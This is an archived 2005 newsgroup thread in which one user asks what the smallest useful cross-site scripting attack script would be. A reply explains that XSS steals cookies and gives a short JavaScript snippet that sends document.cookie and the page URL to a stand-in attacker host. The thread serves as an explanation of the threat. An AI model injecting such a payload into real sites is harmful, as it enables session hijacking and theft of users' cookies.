Velocity Reviews - Computer Hardware Reviews

Velocity Reviews > Newsgroups > Programming > ASP .Net > Cross site scripting

Reply
Thread Tools

Cross site scripting

 
 
=?Utf-8?B?QnJhZCBRdWlubg==?=
Guest
Posts: n/a
 
      04-27-2005
This is not an ASP.NET question per se. I'm asking since a lot of smart
people lurk here.

What is the smallest script that would be useful to an attacker?

 
Reply With Quote
 
 
 
 
Brock Allen
Guest
Posts: n/a
 
      04-27-2005
XSS is typically used to steal cookies and send them to the attacker so they
can spoof your session or identity on the site it was stolen from. As for
the code, well, I'm not a h4X0r, so I don't know what else it'd be beyond:

var xmlRequest = new XMLHttpRequest();
xmlRequest.open("GET", "http://haxor.org?Cookie=" + document.cookie + "&URL="
+ document.url, false);
xmlRequest.send(null);

But this gives you the idea. Again, there are probabaly more clever/malicious
things that can be done.

-Brock
DevelopMentor
http://staff.develop.com/ballen



> This is not an ASP.NET question per se. I'm asking since a lot of
> smart people lurk here.
>
> What is the smallest script that would be useful to an attacker?
>




 
Reply With Quote
 
 
 
Reply

Thread Tools

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Validating Request.Params[] values for cross site scripting oopaevah@yahoo.co.uk ASP .Net 3 01-10-2006 02:19 PM
Cross Site Scripting for .exe? kashmira.phalak@gmail.com Computer Security 3 06-07-2005 10:18 PM
Allow HTML input in form field WITH Cross-Site scripting security Earl Teigrob ASP .Net 0 02-18-2004 11:27 PM
Cross-Site Scripting... Scott M. ASP .Net 7 12-24-2003 09:33 AM
Preventing Cross Site Scripting Qaurk Noble Java 0 12-11-2003 05:41 PM



Advertisments